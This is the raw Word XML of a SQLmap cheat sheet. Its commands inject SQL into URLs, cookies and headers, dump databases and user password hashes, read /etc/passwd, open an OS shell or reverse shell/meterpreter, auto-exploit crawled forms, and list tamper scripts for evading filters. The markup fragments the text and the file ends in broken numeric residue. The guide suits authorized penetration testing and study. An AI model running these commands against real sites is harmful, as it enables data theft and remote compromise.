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FBAE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 xml:space="preserve">Basic arguments for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00766381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SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72573A8B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Generic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176DDBC3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6C9485A7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-u "&lt;URL&gt;" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D85241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-p "&lt;PARAM TO TEST&gt;" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD84162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--user-agent=SQLMAP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C51282A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--random-agent </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407EABC0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--threads=10 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568FAC1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--risk=3 #MAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C9787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--level=5 #MAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F8171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dbms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="&lt;KNOWN DB TECH&gt;" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB58A77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="&lt;OS&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028DDCD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--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175DBCE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--batch #Non interactive mode, usually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will ask you questions, this accepts the default answers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0224EED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--auth-type="&lt;AUTH&gt;" #HTTP authentication type (Basic, Digest, NTLM or PKI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEBA7CA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--auth-cred="&lt;AUTH&gt;" #HTTP authentication credentials (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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name:password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3490C9A0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--proxy=http://127.0.0.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3193D66B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--union-char "GsFRts2" #Help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identify union SQLi techniques with a weird union char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9591C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Retrieve Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7807318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Internal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4703C988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775736F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--current-user #Get current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E4129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--is-dba #Check if current user is Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AA370C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--hostname #Get hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240E9B6E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--users #Get usernames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od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DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D9D2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--passwords #Get passwords of users in DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B32EB57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--privileges #Get privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7B19FC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DB data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA0A6EB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3A30856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--all #Retrieve everything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727B6A6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--dump #Dump DBMS database table entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AE006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dbs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#Names of the available databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455178F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--tables #Tables of a database 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 -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 &lt;DB NAME&gt; )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619A222C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--columns #Columns of a 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table  (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-D &lt;DB NAME&gt; -T &lt;TABLE NAME&gt; )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711DE3A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-D &lt;DB NAME&gt; -T &lt;TABLE NAME&gt; -C &lt;COLUMN NAME&gt; #Dump column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B3463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Injection place</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5298E5C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From Burp/ZAP capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB3AF3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Capture the request and create a req.txt </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5E55224C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0311B79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-r req.txt --current-user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BD10F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GET Request Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4540D043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628286D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"http://example.com/?id=1" -p id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447B9A2E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"http://example.com/?id=*" -p id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D6B9C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POST Request Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA172FD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68C52521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"http://example.com" --data "username=*&amp;password=*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E5F4B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Injections in Headers and other HTTP Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040AA734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7BD192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#Inside cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7BE8C2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-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 "http://example.com" --cookie "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mycookies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=*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589D154B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1D46CEA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#Inside some header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40722EB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"http://example.com" --headers="x-forwarded-for:127.0.0.1*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7777D53C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"http://example.com" --headers="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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referer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:*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</w:p>
    <w:p w14:paraId="4B3C5110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3FEACC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#PUT Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C38141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--method=PUT -u "http://example.com" --headers="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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referer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:*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</w:p>
    <w:p w14:paraId="4E673AC7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6946B34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#The injection is located at the '*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585822C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Indicate string when injection is </w:t>
      </w:r>
      <w:proofErr w:type="gram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successful</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="483AF56C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8E614DE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--string="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string_showed_when_TRUE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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB39F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lastRenderedPageBreak/>
        <w:t>Eval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AB0D0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allows the use of </w:t>
      </w:r>
      <w:r w:rsidRPr="00766381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-e</w:t>
      </w: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or </w:t>
      </w:r>
      <w:r w:rsidRPr="00766381">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New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--eval</w:t>
      </w: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process each payload before sending it with some python </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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oneliner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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This makes very easy and fast to process in custom ways the payload before sending it. In the following example the </w:t>
      </w:r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flask cookie session</w:t>
      </w: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is signed by flask with the known secret before sending it</w:t>
      </w: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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1720632C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5089525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http://1.1.1.1/sqli --eval "from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flask_unsign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import session as s; session = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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s.sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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({'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uid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': session}, secret='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SecretExfilratedFromTheMachine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')" --cookie="session=*" --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F28DF1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Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E048A58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F3C22E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#Exec command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31136543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sqlmap.py -u "http://example.com/?id=1" -p id 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os-cmd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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50208C6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0BB7868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#Simple Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB03EC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sqlmap.py -u "http://example.com/?id=1" -p id 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-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76656DC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C312D1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#Dropping a reverse-shell /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meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="759B44A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sqlmap.py -u "http://example.com/?id=1" -p id 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os-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pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="60A6E76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Read File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E08681B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38EC02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--file-read=/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366E8B2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Crawl a website with </w:t>
      </w:r>
      <w:proofErr w:type="spell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SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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and auto-</w:t>
      </w:r>
      <w:proofErr w:type="gram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exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="49DE5CF2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72A085B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-u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133649C6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24B8DC51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--batch = non interactive mode, usually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will ask you questions, this accepts the default answers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E8C96B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--crawl = how deep you want to crawl a site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1783FE57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--forms = Parse and test forms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC11BBC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Second Order Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3451C3C1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3FCF8F64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>python sqlmap.py -r /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tmp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/r.txt --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dbms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MySQL --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second-order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"http://targetapp/wishlist" -v 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BCC5B9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-r 1.txt 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dbms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MySQL -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second-order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"http://&lt;IP/domain&gt;/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joomla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/administrator/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index.php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-D "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joomla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-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dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CFA0E3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6" w:history="1">
        <w:r w:rsidRPr="00766381">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial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Read this post</w:t>
        </w:r>
        <w:r w:rsidRPr="0076638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</w:t>
        </w:r>
      </w:hyperlink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about how to perform simple and complex second order injections with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400137AA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Customizing Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C1581E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Set a </w:t>
      </w:r>
      <w:proofErr w:type="gram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suffix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="595E24D4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0BB7C01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sqlmap.py -u "http://example.com/?id=1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 -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 id --suffix="-- "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23521658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Prefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2FE079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0AC345C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python sqlmap.py -u "http://example.com/?id=1</w:t>
      </w:r>
      <w:proofErr w:type="gram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  -</w:t>
      </w:r>
      <w:proofErr w:type="gram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 id --prefix="') "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005858CF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Help finding </w:t>
      </w:r>
      <w:proofErr w:type="spell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injection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5853A031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B354AFA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# The --not-string "string" will help finding a string that does not appear in True responses (for finding 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boolean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blind injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668A0C2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-r r.txt -p id --not-string ridiculous --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5900D18A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Tamper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F737CC5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Remember that </w:t>
      </w:r>
      <w:r w:rsidRPr="00766381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you can create your own tamper in python</w:t>
      </w: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it's very simple. You can find a tamper example in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00766381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Second Order Injection page here</w:t>
        </w:r>
      </w:hyperlink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5C8638AD" w14:textId="77777777" w:rsidR="00766381" w:rsidRPr="00766381" w:rsidRDefault="00766381" w:rsidP="00766381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4393E02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--tamper=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name_of_the_tamper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="430CA18D" w14:textId="77777777" w:rsidR="00766381" w:rsidRPr="00766381" w:rsidRDefault="00766381" w:rsidP="007663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 kali you can see all the tampers in /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usr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/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00766381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/tamper</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11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8457"/>
      </w:tblGrid>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="2EEED4A0" w14:textId="77777777" w:rsidTr="0076638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auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="E5E7EB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="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E7B5C" w14:textId="77777777" w:rsidR="00766381" w:rsidRPr="00766381" w:rsidRDefault="00766381" w:rsidP="00766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Tamper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6" w:space="0" w:color="E5E7EB"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="E5E7EB"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18EF49CC" w14:textId="77777777" w:rsidR="00766381" w:rsidRPr="00766381" w:rsidRDefault="00766381" w:rsidP="00766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66381" w:rsidRPr="00766381" w14:paraId="0AB05BB4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5FDCD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apostrophemask.py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A7C7F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apostrophe character with its UTF-8 full width counterpart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="7A894597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BAC89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apostrophenullencode.py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AEAF5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apostrophe character with its illegal double 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unicode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counterpart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="31051771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3F996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appendnullbyte.py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ED05D2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Appends encoded NULL byte character at the end of payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="4C6AD39D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610ED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base64encode.py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82F7D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Base64 all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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="2D5E2E60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45061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between.py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06F12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greater than operator ('&gt;') with 'NOT BETWEEN 0 AND #'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="04B679A1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25DE1D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bluecoat.py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C6ABB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space character after SQL statement with a valid random blank </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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character.Afterwards</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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replace character = with LIKE operator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="21D100EF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64C99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chardoubleencode.py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957C5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Double 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-encodes all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 (not processing already encoded)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="2B537CED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1DA20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commalesslimit.py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DE7C4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instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="07C3BE27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C599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commalessmid.py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364A0D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instances like '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MID(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A, B, C)' with 'MID(A FROM B FOR C)'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="2C114EAA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62811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concat2concatws.py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FEF533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instances like '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CONCAT(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A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="60BC84A3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039EE2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charencode.py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316C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-encodes all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 (not processing already encoded)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="422AF407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39469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charunicodeencode.py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5605D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Unicode-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-encodes non-encoded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 (not processing already encoded). "%u0022"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="77BE288E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E0921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charunicodeescape.py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51B5F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Unicode-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-encodes non-encoded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 (not processing already encoded). "\u0022"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="589FD4F7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26C46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equaltolike.py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495DC9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all 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occurances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operator equal ('=') with operator 'LIKE'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="4217C89A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B9E59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escapequotes.py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AAA8B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Slash escape quotes (' and ")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="41E71E1E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779E6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greatest.py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04A2D1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greater than operator ('&gt;') with 'GREATEST' counterpart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="3C9F4A54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7B37D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halfversionedmorekeywords.py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1A363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versioned MySQL comment before each keyword</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="403DCA96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F34AA3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ifnull2ifisnull.py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832C0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instances like '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IFNULL(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A, B)' with 'IF(ISNULL(A), B, A)'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="43CF1BE3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91AA7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modsecurityversioned.py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4680F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Embraces complete query with versioned comment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="01174C86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6DB34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modsecurityzeroversioned.py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8450A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Embraces complete query with zero-versioned comment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="6CBC42BF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DF5E1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multiplespaces.py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294EA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multiple spaces around SQL keywords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="5CC831C8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599BE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nonrecursivereplacement.py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BF23AB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predefined SQL keywords with representations suitable for replacement (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e.g. .replace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("SELECT", "")) filters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="135FD2A3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2ABD9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percentage.py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B928D3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Adds a percentage sign ('%') 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infront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each character</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="24D9F1F8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20829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overlongutf8.py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3ED0B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Converts all characters </w:t>
            </w:r>
            <w:proofErr w:type="gram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a given</w:t>
            </w:r>
            <w:proofErr w:type="gram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payload (not processing already encoded)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="7C741605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2489BD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randomcase.py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C4FEE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each keyword character with random case value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="5CBE8F3F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7DB4C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randomcomments.py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8E076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random comments to SQL keywords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="68946624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8A50C3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securesphere.py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48F96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Appends special crafted string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="45D47E54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1F53D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sp_password.py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DF192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Appends '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sp_password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 to the end of the payload for automatic obfuscation from DBMS logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="7C9333D8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FF26EC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space2comment.py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84ED5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comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="35658E49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38D9AF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space2dash.py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03DDEC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dash comment ('--') followed by a random string and a new line ('\n')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="6651EB93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106169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space2hash.py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75B94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pound character ('#') followed by a random string and a new line ('\n')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="476862F1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C7603C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space2morehash.py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C3C4F9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pound character ('#') followed by a random string and a new line ('\n')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="5A01DFA8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A8934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space2mssqlblank.py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2657C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random blank character from a valid set of alternate characters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="504C6E6A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EE07A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space2mssqlhash.py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A753F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pound character ('#') followed by a new line ('\n')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="5E328C1B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34A9E2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space2mysqlblank.py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66009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random blank character from a valid set of alternate characters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="5078E4F8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35D86D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space2mysqldash.py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BCA7A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dash comment ('--') followed by a new line ('\n')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="0B99973F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F4F17C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space2plus.py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0F165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plus ('+')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="76D15424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4C009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space2randomblank.py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BE6263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space character (' ') with a random blank character from a valid set of alternate characters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="6DD9D89A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95E3A9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symboliclogical.py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4BAA8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AND </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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  <w:proofErr w:type="spellEnd"/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logical operators with their symbolic counterparts (&amp;&amp; and</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="2B73128D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578ACC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unionalltounion.py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74A1E2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UNION ALL SELECT with UNION SELECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="3598BF63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9B6E94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unmagicquotes.py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EE2F4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quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="58F6872E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317E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uppercase.py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E8B1B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each keyword character with upper case value 'INSERT'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="52A7D53E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ACD77E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varnish.py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D39FD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 a HTTP header 'X-originating-IP'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="68BF1F07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AC9926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versionedkeywords.py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7BF050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Encloses each non-function keyword with versioned MySQL comment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="37F5214B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163407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versionedmorekeywords.py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D693E8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Encloses each keyword with versioned MySQL comment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766381" w:rsidRPr="00766381" w14:paraId="4CDFC356" w14:textId="77777777" w:rsidTr="0076638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0B1762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xforwardedfor.py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8CDBFA" w14:textId="77777777" w:rsidR="00766381" w:rsidRPr="00766381" w:rsidRDefault="00766381" w:rsidP="0076638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 a fake HTTP header 'X-Forwarded-For'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F37596D" w14:textId="77777777" w:rsidR="00240D72" w:rsidRDefault="00240D72"/>
    <w:sectPr w:rsidR="00240D7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BE91" w14:textId="77777777" w:rsidR="00AC6B24" w:rsidRDefault="00AC6B24" w:rsidP="00766381">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2B0F8AA6" w14:textId="77777777" w:rsidR="00AC6B24" w:rsidRDefault="00AC6B24" w:rsidP="0076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08B5" w14:textId="46CA051A" w:rsidR="00766381" w:rsidRDefault="007663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32827F" wp14:editId="04C5CA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46FB7" w14:textId="62AEAD66" w:rsidR="00766381" w:rsidRPr="00766381" w:rsidRDefault="00766381" w:rsidP="007663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6638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3282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C346FB7" w14:textId="62AEAD66" w:rsidR="00766381" w:rsidRPr="00766381" w:rsidRDefault="00766381" w:rsidP="007663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6638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3C3A" w14:textId="0BF8F2D1" w:rsidR="00766381" w:rsidRDefault="007663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87F11F" wp14:editId="1068403A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D9548" w14:textId="09748C47" w:rsidR="00766381" w:rsidRPr="00766381" w:rsidRDefault="00766381" w:rsidP="007663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6638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7F1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59D9548" w14:textId="09748C47" w:rsidR="00766381" w:rsidRPr="00766381" w:rsidRDefault="00766381" w:rsidP="007663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6638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8BB8" w14:textId="132E11E2" w:rsidR="00766381" w:rsidRDefault="007663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70CFE2" wp14:editId="377845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CF354" w14:textId="09AFC7D8" w:rsidR="00766381" w:rsidRPr="00766381" w:rsidRDefault="00766381" w:rsidP="007663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76638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70CF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81CF354" w14:textId="09AFC7D8" w:rsidR="00766381" w:rsidRPr="00766381" w:rsidRDefault="00766381" w:rsidP="007663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76638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6062" w14:textId="77777777" w:rsidR="00AC6B24" w:rsidRDefault="00AC6B24" w:rsidP="00766381">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7C724716" w14:textId="77777777" w:rsidR="00AC6B24" w:rsidRDefault="00AC6B24" w:rsidP="00766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4E"/>
    <w:rsid w:val="00240D72"/>
    <w:rsid w:val="006D2F4E"/>
    <w:rsid w:val="00766381"/>
    <w:rsid w:val="00835E55"/>
    <w:rsid w:val="00845DCA"/>
    <w:rsid w:val="00AC6B24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2463E-123A-4A72-BC22-4F4F181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6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66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6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81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0076638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63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638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63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3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381"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ml-3">
    <w:name w:val="ml-3"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00766381"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="max-w-3xl">
    <w:name w:val="max-w-3xl"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0076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6381"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="mx-auto">
    <w:name w:val="mx-auto"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0076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08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92923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4817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564085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921231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454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20891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0632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12703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001102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8759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883247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7520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46105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2348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10856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8100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299337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482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953914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532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986622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083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626987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385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099316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02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60343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8663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470834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449687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063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86381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9308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852130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2088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302947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73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03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7644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4917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37501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251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2813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565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159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815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78227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3135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6816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143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50808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6061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8382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100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8719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7879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26797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8193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36430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05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00379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482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703165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7337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5736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43039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7596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14805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7253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6713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8627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4694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763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38786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0127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4323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0020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7462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3760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508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1370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30410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2627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96100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7837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4195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2520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21227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4739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5831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9506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2455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5578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6707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5697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20302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225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39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8850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6848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9076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55741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700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42856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2654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55895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422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7878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335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84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0659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8423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9671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15667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796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99410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897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2932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610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41699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9804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38093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803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373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2944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95377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53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64708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9428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7397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9177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788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22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07738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9737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3090